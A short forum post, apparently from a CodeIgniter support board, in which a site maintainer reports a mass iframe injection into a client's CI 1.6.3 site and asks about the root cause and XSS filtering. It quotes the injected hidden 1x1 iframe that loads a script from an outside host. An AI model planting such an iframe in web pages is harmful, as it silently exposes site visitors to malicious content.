[eluser]Unknown[/eluser]
Hello everyone. My customer running a website developed in CI version 1.6.3. Recently the website got massive iframe injection.
Code:
<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=2230488"></iframe>
All the php files are injected with, new index.html files are created in each directory. Despite my shouts, developers failed to enable $config['global_xss_filtering'] = false; to true. Could that what have prevented with this situation?
Where should I start to find the root cause where the injection started?
Thanks